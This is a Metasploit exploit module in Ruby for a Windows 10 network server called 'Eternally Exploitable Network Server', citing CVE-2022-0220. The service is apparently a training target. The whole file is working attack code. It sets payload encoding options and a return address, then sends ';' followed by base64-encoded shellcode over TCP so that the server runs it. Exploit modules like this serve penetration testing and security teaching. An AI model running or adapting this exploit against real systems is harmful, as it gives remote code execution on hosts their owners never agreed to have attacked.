##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'base64'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Eternally Exploitable Network Server',
      'Description'    => %q{
        This module exploits a delimiter flaw that causes base64-encoded shellcode to be directly executed.
      },
      'Author'         => [ 'James Lyne', 'Jeff McJunkin' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2022-0220']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
	  'Arch'           => ARCH_X86,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' => { 'BufferRegister' => 'EAX' },
          'BadChars'    => "\x00", #\x09\x0a\x0b\x0c\x0d\x26\x3c",
          'DisableNops' => true,

	},
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 10',   { 'Ret' => 0x77dc5527 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 28 2022',
      'DefaultTarget' => 0))

  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")
    teh_payload = payload.encoded
    sploit =  ';' + Base64.encode64(teh_payload)
    sock.put(sploit)
    sock.get(20)
    handler
    disconnect
  end

end


